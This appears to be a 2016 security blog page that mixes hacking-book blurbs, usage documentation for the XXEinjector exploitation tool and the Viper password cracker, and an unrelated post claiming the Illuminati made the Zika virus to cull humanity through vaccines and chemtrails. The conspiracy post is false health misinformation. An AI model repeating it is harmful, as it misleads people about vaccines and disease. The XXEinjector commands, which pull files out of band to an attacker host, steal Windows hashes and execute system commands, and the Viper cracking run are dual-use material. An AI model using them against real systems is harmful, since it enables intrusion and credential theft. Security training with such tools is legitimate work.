SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT


Wednesday, February 3, 2016

Penetration Testing



Book Description:

Penetration testers simulate cyber attacks to find security weaknesses in networks, operating systems, and applications. Information security experts worldwide use penetration techniques to evaluate enterprise defenses.

In Penetration Testing, security expert, researcher, and trainer Georgia Weidman introduces you to the core skills and techniques that every pentester needs. Using a virtual machine–based lab that includes Kali Linux and vulnerable operating systems, you’ll run through a series of practical lessons with tools like Wireshark, Nmap, and Burp Suite. As you follow along with the labs and launch attacks, you’ll experience the key stages of an actual assessment, including information gathering, finding exploitable vulnerabilities, gaining access to systems, post exploitation, and more.




Source: allitebooks

By Offensive Sec

Penetration Testing with BackBox



Book Description:

BackBox is an amazing Linux security distribution designed with the needs of security and system administration specialists in mind. It has been developed to perform penetration tests and security assessments. Designed to be fast and easy to use while providing a minimal yet complete desktop environment, BackBox comes with its own software repositories and is continually updated to the latest stable version of the most widely used and best-known ethical hacking tools.

This book provides an exciting introduction to BackBox Linux in order to give you familiarity with and understanding of this amazing Linux security distro, making you feel comfortable with both the subject of pen-testing and BackBox. The book progresses through topics based on standard cases of penetration testing, from the initial steps to the final procedures.

This book will help you discover the exciting world of penetration testing through a series of step-by-step, practical lessons. Penetration Testing with BackBox is organized into eight chapters. It starts with an introduction to BackBox Linux, giving you a solid grounding in this amazing Linux security distro, including both its design philosophy and feature set, before moving on to practical tutorials on using BackBox. The book is arranged in chronological order based on standard cases of penetration testing. For those more experienced in the use of penetration testing tools, each chapter can be read independently, providing a detailed overview of how BackBox will augment your arsenal of tools at each step of the penetration testing process.





Source: allitebooks

By Offensive Sec

Illuminati Weapon to Reduce Humanity - Zika Virus





When I first released the video making claims about this subject, some deluded people, defenders and slaves of the system, thought it was absurd and criticized this hypothesis.

But every day this hypothesis is confirmed, and more seriously, because it is not only Brazil, Latin America and Africa that are being affected, but the whole planet. This virus is being spread through mosquitoes, vaccines, chemtrails and everything else...

They will create campaigns to vaccinate people as a deceptive way of immunizing, and with that they will inject the virus itself into the vaccines; they have been doing this kind of contamination of the population for a long time with various other viruses.

The Zika virus was created to reduce the world population. It directly affects children during gestation, but it also affects everyone, sickening people, with the brain as the main target. Even when people think they have been cured by the treatments, they have not; they remain infected with the virus. There is no cure, or rather, there is one, since they never create anything without the antidote, but it will not be within reach of the common population. Articles have been published with reports of a supposed vaccine ten years from now; if so, any campaign now would be for more contamination, and they do not want to cure people but, as I said before, to reduce them.

The virus affects the brains of grown people; the after-effects would be mental retardation, death of neurons and so on. If it causes a reduction of the brain in babies, then in children, young people and adults it would almost certainly be exactly that.

I prepared this second video to reinforce the first. None of this is theoretical, it is all being confirmed; the Illuminati are reaching their goals, and the skeptics are helping them with disinformation. These will die defending the system, whether because they work in laboratories and think they know things, it does not matter; they have always placed their profession above the health of others and even their own.

The Illuminati have goals, and they are throwing everything against the world population to achieve their objectives, which is to drastically reduce humanity. If you still do not believe this fact, it does not matter; their agenda remained for a long time without your knowledge, and that is exactly why they are where they are, and so are all of us...

Watch the video







Source: Oculto Revelado

By Offensive Sec

Penetration Testing with the Bash shell



Book Description:

This book teaches you to take your problem solving capabilities to the next level with the Bash shell, to assess network and application level security by leveraging the power of the command-line tools available with Kali Linux.

The book begins by introducing some of the fundamental bash scripting and information processing tools. Building on this, the next few chapters focus on ways to customize your Bash shell using functionalities such as tab completion and rich text formatting. After the fundamental customization techniques and general purpose tools have been discussed, the book moves on to the command-line-based security tools in the Kali Linux operating system. The general approach in discussing these tools is to combine them with the general purpose tools covered in earlier chapters when performing security assessments. This is a one stop solution to learn Bash and solve information security problems.




Source: allitebooks

By Offensive Sec

Tuesday, February 2, 2016

Tool For Automatic Exploitation Of XXE Vulnerability - XXEinjector





XXEinjector automates retrieving files using direct and out-of-band methods. Directory listing only works in Java applications; for other applications the bruteforcing method needs to be used.


Options 

--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
--file Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
--path Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
--brute Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)
--logger Log results only. Do not send requests. HTTP logger looks for "p" parameter with results.

--rhost Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3)
--rport Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)

--oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)
--direct Use direct exploitation instead of out of band. A unique mark should be specified as the value for this argument. This mark specifies where the results of the XXE start and end. Specify --xml to see how the XML in the request file should look. (--direct=UNIQUEMARK)
--2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
--phpfilter Use PHP filter to base64 encode target file before sending.
--netdoc Use netdoc protocol instead of file (Java).
--enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445)

--hashes Steals Windows hash of the user that runs an application.
--expect Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)
--upload Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)
--xslt Tests for XSLT injection.

--ssl Use SSL.
--proxy Proxy to use. (--proxy=127.0.0.1:8080)
--httpport Set custom HTTP port. (--httpport=80)
--ftpport Set custom FTP port. (--ftpport=21)
--gopherport Set custom gopher port. (--gopherport=70)
--jarport Set custom port for uploading files using jar. (--jarport=1337)
--xsltport Set custom port for XSLT injection test. (--xsltport=1337)

--test This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server.
--urlencode URL encode injected DTD. This is default for URI.
--nodtd Use this if you want to put the DTD in the request yourself. Specify "--dtd" to show how the DTD should look.
--output Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)
--timeout Timeout for receiving file/directory content. (--timeout=20)
--contimeout Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)
--fast Skip asking what to enumerate. Prone to false-positives.
--verbose Show verbose messages.

Example usage

Enumerating /etc directory in HTTPS application: 

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl

Enumerating /etc directory using gopher for OOB method: 

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

Second order exploitation: 

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt 

Bruteforcing files using HTTP out of band method and netdoc protocol: 

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc

Enumerating using direct exploitation: 

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

Enumerating unfiltered ports: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

Stealing Windows hashes: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes

Uploading files using Java jar: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf

Executing system commands using PHP expect: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls

Testing for XSLT injection: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt

Log requests only: 

ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt 
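As an added defensive example (not part of XXEinjector or this post), the following Python inspects the XML body of a captured HTTP request, in the same request-file shape the tool consumes, for external entity declarations of the kind the options above inject, and shows a parser that refuses DOCTYPEs outright. The sample request, hostname and URIs are constructed.

```python
import re
from xml.etree import ElementTree as ET

# URI schemes XXE payloads reach for: local files (file, netdoc), out-of-band
# channels (http, ftp, gopher, jar) and PHP wrappers (php://filter, expect).
RISKY_SCHEMES = ("file:", "netdoc:", "http:", "https:", "ftp:", "gopher:",
                 "jar:", "php:", "expect:")

# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY % name SYSTEM "uri"> (parameter entity).
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]*)"',
    re.IGNORECASE,
)

# Constructed sample request (host and URIs are made up for this example).
SAMPLE_REQUEST = """POST /api/import HTTP/1.1
Host: app.example.test
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
  <!ENTITY % oob SYSTEM "http://listener.example/remote.dtd">
]>
<data>&xxe;</data>
"""

def split_http_request(raw: str) -> str:
    """Return the body of a raw HTTP request; headers end at the first blank line."""
    _head, sep, body = raw.replace("\r\n", "\n").partition("\n\n")
    return body if sep else ""

def find_external_entities(xml_text: str) -> list:
    """List every external entity declared in the DTD and flag risky URI schemes."""
    if "<!DOCTYPE" not in xml_text.upper():
        return []
    found = []
    for m in ENTITY_RE.finditer(xml_text):
        uri = m.group("uri")
        found.append({"name": m.group("name"), "parameter": m.group("param") is not None,
                      "uri": uri, "risky": uri.lower().startswith(RISKY_SCHEMES)})
    return found

def parse_without_dtd(xml_text: str) -> ET.Element:
    """Hardened parse: reject any DOCTYPE up front, so no entity (external or
    internal) can be declared; expat then only sees plain markup."""
    if "<!DOCTYPE" in xml_text.upper():
        raise ValueError("DOCTYPE declarations are not accepted")
    return ET.fromstring(xml_text)

def rejects_doctype(xml_text: str) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_without_dtd(xml_text)
    except ValueError:
        return True
    return False
```

Running the detector over a saved request file is a quick way to triage whether a proxied or logged request carried an injected DTD; the hardened parser is the server-side fix.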






Cracking Unix Passwords Brute Force - Viper





Viper is a brute force UNIX-style password cracker for passwords encrypted with crypt. It has been developed from Hale's viper 1.4 Perl program. While there are other, more powerful crack programs out there, this one is about studying the safety of passwords while hardware speed is increasing drastically. If I remember right, I read that on a PDP-11 the password generation took 30 seconds. Now we can do more than 230.000 generations per second on a single CPU core of a single system, increasing speed by a factor of several million. Still, there is some time to go for an 8-character password on the full keyspace; see keyspace.txt.

Originally, the ufc-crypt implementation seemed to be the fastest crypt function around, using it made porting the program to different platforms easy.

Viper runs under Linux, Solaris, HPUX and DOS/Windows.


Usage 

Viper v1.6 (Hale 05/12/2000) - C version by Frank4DD (05/05/2014)
Wiltered Fire - www.wilter.com/wf, incl. bugfixes by David C. Rankin

        -f     File to load password from (required unless using lsf)
        -u     Username to load from file (required unless using lsf)
        -lsf   Load saved file from previous session
        -pf    Save progress to file at update interval
        -rf #        Amount of time in hours to run for (default infinite)
        -c #         Character set from charset.ini to use (default 1)
        -pws #       Minimum password length (starting value, default 1)
        -pwl #       Maximum password length (default 8 - maximum 16)
        -ui #        Console update interval (in minutes - default 10)

        -v           Verbose output




Usage Example 

susie112:/home/me/viper-1.6/src # ./viper -f passwd -u root -ui 1 -v

Viper v1.6 (Hale 05/12/2000) - C version by Frank4DD (05/05/2014)
Wiltered Fire - www.wilter.com/wf, incl. bugfixes by David C. Rankin

Found: user root pw:reUJbHrFWYCQk
Found: Charset 0 in charset.ini
...command line parameters loaded.
Character set is 93 chars long
Starting crack on: Sun Oct  3 23:04:44 2009
Cracking for pass length 1 (93 possibilities)
Cracking for pass length 2 (8649 possibilities)
Cracking for pass length 3 (804357 possibilities)
Cracking for pass length 4 (7.48052e+07 possibilities)

[ Length: | Last:    | CPS:    | Time Spent:      | Time Remaining:  | Done:  ]
-------------------------------------------------------------------------------
[    4    |     kq2r |  150000 | 000d:00h:01m:00s | 000d:00h:07m:18s | 12.03% ]

 The password has been located.
 Username : root
 Password : test
 Started  : Sun Oct  3 23:04:44 2009
 Finished : Sun Oct  3 23:06:30 2009
 Duration : 000d:00h:01m:00s


Viper exiting...
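As an added worked example (not Viper's own code), this Python reproduces the arithmetic behind the status line above: possibilities per length for the 93-character set, percent done and time remaining at 150000 crypt calls per second after one minute on length 4, and how long lengths 1 to 8 take to exhaust at 230000 per second. The 365.25-day year is an assumption.

```python
# Keyspace and time-to-exhaust arithmetic for a Viper-style brute force run.
CHARSET_LEN = 93  # "Character set is 93 chars long" in the run above

def keyspace(charset_len: int, length: int) -> int:
    """Number of candidates of exactly `length` characters."""
    return charset_len ** length

def cumulative_keyspace(charset_len: int, min_len: int, max_len: int) -> int:
    """Candidates tried when walking every length from min_len to max_len."""
    return sum(keyspace(charset_len, n) for n in range(min_len, max_len + 1))

def fmt_duration(seconds: float) -> str:
    """Format like Viper's status line: 000d:00h:07m:18s."""
    s = int(seconds)
    d, s = divmod(s, 86400)
    h, s = divmod(s, 3600)
    m, s = divmod(s, 60)
    return f"{d:03d}d:{h:02d}h:{m:02d}m:{s:02d}s"

def progress(charset_len: int, length: int, cps: int, elapsed_s: int) -> dict:
    """Reconstruct the status line for one password length from the crack rate."""
    total = keyspace(charset_len, length)
    tried = min(cps * elapsed_s, total)
    return {
        "tried": tried,
        "done_pct": round(100.0 * tried / total, 2),
        "remaining": fmt_duration((total - tried) / cps),
    }

def years_to_exhaust(charset_len: int, max_len: int, cps: int) -> float:
    """Years to walk lengths 1..max_len at cps candidates per second (365.25-day years assumed)."""
    return cumulative_keyspace(charset_len, 1, max_len) / cps / 31_557_600

if __name__ == "__main__":
    for n in range(1, 9):
        print(f"length {n}: {keyspace(CHARSET_LEN, n):.6g} possibilities")
    print(progress(CHARSET_LEN, 4, 150000, 60))
    print(f"lengths 1-8 at 230000 c/s: {years_to_exhaust(CHARSET_LEN, 8, 230000):.0f} years")
```

The length-4 figures match the status line in the run above (12.03% done, 7m18s remaining), while the full 8-character keyspace comes out at several hundred years on one core, which is the point keyspace.txt makes about password length.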



Latest Updates 

• Viper Version 1.5 has been updated to use the OpenSSL DES routines for encrypting. The UFC library has been dropped as outdated and even generating segfaults on some systems. There is a performance gain of approx. 25% coming from the OpenSSL libraries. In addition to the libraries, the OpenSSL headers (dev package) need to be installed in order to be able to compile Viper.

• Viper Version 1.6 received bugfixes thanks to David C. Rankin.


See also http://fm4dd.com/sw/viper/ 



Perl Brik Platform - Metabrik



Smartphones have their apps, Web browsers have their apps, shells don’t. With Metabrik, we tried to merge the power of shells with the power of the Perl language by creating a platform that allows you to quickly write reusable Briks.

Metabrik goals:

• Glue the Perl language with a shell
• Give a standardised API to write reusable Briks
• Self-documented Briks to make them easy to use
• Only 4 main shell commands to remember: use, set, get, run

Metabrik features:

• Completion on Brik names, Commands and Attributes
• Completion on file manipulation
• Completion on Perl variable names
• Command history and recalling
• Customization support with a .rc file
• Scripting support
• Multiple Brik repositories support

Metabrik helps you to concentrate on scenarios instead of wasting your time searching how to use a program. You just have to reuse available Briks to perform your everyday job.

The two main ideas behind Metabrik are:

• You have the brain, code has the details
• Do it once


Practical Reverse Engineering



Book Description:

Reverse engineering is the process of analyzing hardware or software and understanding it, without having access to the source code or design documents. Hackers are able to reverse engineer systems and exploit what they find with scary results. Now the good guys can use the same tools to thwart these threats. Practical Reverse Engineering goes under the hood of reverse engineering for security analysts, security engineers, and system programmers, so they can learn how to use these same processes to stop hackers in their tracks.

The book covers x86, x64, and ARM (the first book to cover all three); Windows kernel-mode code rootkits and drivers; virtual machine protection techniques; and much more. Best of all, it offers a systematic approach to the material, with plenty of hands-on exercises and real-world examples.




Source: allitebooks

By Offensive Sec

The Art of Memory Forensics



Book Description:

Memory forensics is the art of analyzing computer memory (RAM) to solve digital crimes. As a follow-up to the best seller Malware Analyst’s Cookbook, experts in the fields of malware, security, and digital forensics bring you a step-by-step guide to memory forensics – now the most sought after skill in the digital forensics and incident response fields.

Beginning with introductory concepts and moving toward the advanced, The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory is based on a five day training course that the authors have presented to hundreds of students. It is the only book on the market that focuses exclusively on memory forensics and how to deploy such techniques properly.





Source: allitebooks

By Offensive Sec
Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community